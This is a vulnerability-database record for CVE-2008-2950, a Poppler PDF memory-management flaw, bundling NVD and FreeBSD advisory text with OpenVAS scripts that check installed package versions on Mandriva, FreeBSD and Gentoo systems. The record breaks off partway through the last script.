{"cve": [{"lastseen": "2018-10-12T11:33:47", "bulletinFamily": "NVD", "description": "The Page destructor in Page.cc in libpoppler in Poppler 0.8.4 and earlier deletes a pageWidgets object even if it is not initialized by a Page constructor, which allows remote attackers to execute arbitrary code via a crafted PDF document.", "modified": "2018-10-11T16:45:29", "published": "2008-07-07T19:41:00", "id": "CVE-2008-2950", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2950", "title": "CVE-2008-2950", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:33", "bulletinFamily": "unix", "description": "\nFelipe Andres Manzano reports:\n\nThe libpoppler pdf rendering library, can free\n\t uninitialized pointers, leading to arbitrary code\n\t execution. This vulnerability results from memory\n\t management bugs in the Page class constructor/destructor.\n\n", "modified": "2008-07-07T00:00:00", "published": "2008-07-07T00:00:00", "id": "BC20510F-4DD4-11DD-93E7-0211D880E350", "href": "https://vuxml.freebsd.org/freebsd/bc20510f-4dd4-11dd-93e7-0211d880e350.html", "title": "poppler -- uninitialized pointer", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-04-09T11:41:14", "bulletinFamily": "scanner", "description": "Check for the Version of poppler", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830386", "id": "OPENVAS:1361412562310830386", "title": "Mandriva Update for poppler MDVSA-2008:146 (poppler)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for poppler MDVSA-2008:146 (poppler)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A memory management issue was found in libpoppler by Felipe Andres\n Manzano that could allow for the execution of arbitrary code with\n the privileges of the user running a poppler-based application,\n if they opened a specially crafted PDF file (CVE-2008-2950).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"poppler on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2008.1,\n Mandriva Linux 2008.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-07/msg00029.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830386\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:26:37 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2008:146\");\n script_cve_id(\"CVE-2008-2950\");\n script_name( \"Mandriva Update for poppler MDVSA-2008:146 (poppler)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of poppler\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpoppler2\", rpm:\"libpoppler2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-devel\", rpm:\"libpoppler-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-glib2\", rpm:\"libpoppler-glib2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-glib-devel\", rpm:\"libpoppler-glib-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt2\", rpm:\"libpoppler-qt2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt4-2\", rpm:\"libpoppler-qt4-2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt4-devel\", rpm:\"libpoppler-qt4-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt-devel\", rpm:\"libpoppler-qt-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"poppler\", rpm:\"poppler~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler2\", rpm:\"lib64poppler2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-devel\", rpm:\"lib64poppler-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-glib2\", rpm:\"lib64poppler-glib2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-glib-devel\", rpm:\"lib64poppler-glib-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt2\", rpm:\"lib64poppler-qt2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt4-2\", rpm:\"lib64poppler-qt4-2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt4-devel\", rpm:\"lib64poppler-qt4-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt-devel\", rpm:\"lib64poppler-qt-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpoppler2\", rpm:\"libpoppler2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-devel\", rpm:\"libpoppler-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-glib2\", rpm:\"libpoppler-glib2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-glib-devel\", rpm:\"libpoppler-glib-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt2\", rpm:\"libpoppler-qt2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt4-2\", rpm:\"libpoppler-qt4-2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt4-devel\", rpm:\"libpoppler-qt4-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt-devel\", rpm:\"libpoppler-qt-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"poppler\", rpm:\"poppler~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler2\", rpm:\"lib64poppler2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-devel\", rpm:\"lib64poppler-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-glib2\", rpm:\"lib64poppler-glib2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-glib-devel\", rpm:\"lib64poppler-glib-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt2\", rpm:\"lib64poppler-qt2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt4-2\", rpm:\"lib64poppler-qt4-2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt4-devel\", rpm:\"lib64poppler-qt4-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt-devel\", rpm:\"lib64poppler-qt-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:57:03", "bulletinFamily": "scanner", "description": "Check for the Version of poppler", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=830386", "id": "OPENVAS:830386", "title": "Mandriva Update for poppler MDVSA-2008:146 (poppler)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for poppler MDVSA-2008:146 (poppler)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A memory management issue was found in libpoppler by Felipe Andres\n Manzano that could allow for the execution of arbitrary code with\n the privileges of the user running a poppler-based application,\n if they opened a specially crafted PDF file (CVE-2008-2950).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"poppler on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2008.1,\n Mandriva Linux 2008.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-07/msg00029.php\");\n script_id(830386);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:26:37 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2008:146\");\n script_cve_id(\"CVE-2008-2950\");\n script_name( \"Mandriva Update for poppler MDVSA-2008:146 (poppler)\");\n\n script_summary(\"Check for the Version of poppler\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpoppler2\", rpm:\"libpoppler2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-devel\", rpm:\"libpoppler-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-glib2\", rpm:\"libpoppler-glib2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-glib-devel\", rpm:\"libpoppler-glib-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt2\", rpm:\"libpoppler-qt2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt4-2\", rpm:\"libpoppler-qt4-2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt4-devel\", rpm:\"libpoppler-qt4-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt-devel\", rpm:\"libpoppler-qt-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"poppler\", rpm:\"poppler~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler2\", rpm:\"lib64poppler2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-devel\", rpm:\"lib64poppler-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-glib2\", rpm:\"lib64poppler-glib2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-glib-devel\", rpm:\"lib64poppler-glib-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt2\", rpm:\"lib64poppler-qt2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt4-2\", rpm:\"lib64poppler-qt4-2~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt4-devel\", rpm:\"lib64poppler-qt4-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt-devel\", rpm:\"lib64poppler-qt-devel~0.6~3.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpoppler2\", rpm:\"libpoppler2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-devel\", rpm:\"libpoppler-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-glib2\", rpm:\"libpoppler-glib2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-glib-devel\", rpm:\"libpoppler-glib-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt2\", rpm:\"libpoppler-qt2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt4-2\", rpm:\"libpoppler-qt4-2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt4-devel\", rpm:\"libpoppler-qt4-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpoppler-qt-devel\", rpm:\"libpoppler-qt-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"poppler\", rpm:\"poppler~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler2\", rpm:\"lib64poppler2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-devel\", rpm:\"lib64poppler-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-glib2\", rpm:\"lib64poppler-glib2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-glib-devel\", rpm:\"lib64poppler-glib-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt2\", rpm:\"lib64poppler-qt2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt4-2\", rpm:\"lib64poppler-qt4-2~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt4-devel\", rpm:\"lib64poppler-qt4-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64poppler-qt-devel\", rpm:\"lib64poppler-qt-devel~0.6.4~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:19", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-28T00:00:00", "published": "2008-09-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=61286", "id": "OPENVAS:61286", "title": "FreeBSD Ports: poppler", "type": "openvas", "sourceData": "#\n#VID bc20510f-4dd4-11dd-93e7-0211d880e350\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: poppler\n\nCVE-2008-2950\nThe Page destructor in Page.cc in libpoppler in Poppler 0.8.4 and\nearlier deletes a pageWidgets object even if it is not initialized by\na Page constructor, which allows remote attackers to execute arbitrary\ncode via a crafted PDF document.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://milw0rm.com/exploits/6032\nhttp://www.vuxml.org/freebsd/bc20510f-4dd4-11dd-93e7-0211d880e350.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(61286);\n script_version(\"$Revision: 4164 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-28 09:03:16 +0200 (Wed, 28 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2008-2950\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: poppler\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"poppler\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.8.4_2\")<0) {\n txt += 'Package poppler version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:23", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200807-04.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=61251", "id": "OPENVAS:61251", "title": "Gentoo Security Advisory GLSA 200807-04 (poppler)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Poppler is affected by a memory management issue, which could lead to the\nexecution of arbitrary code.\";\ntag_solution = \"All poppler users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/poppler-0.6.3-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200807-04\nhttp://bugs.gentoo.org/show_bug.cgi?id=229931\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200807-04.\";\n\n \n\nif(description)\n{\n script_id(61251);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2008-2950\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200807-04 (poppler)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n 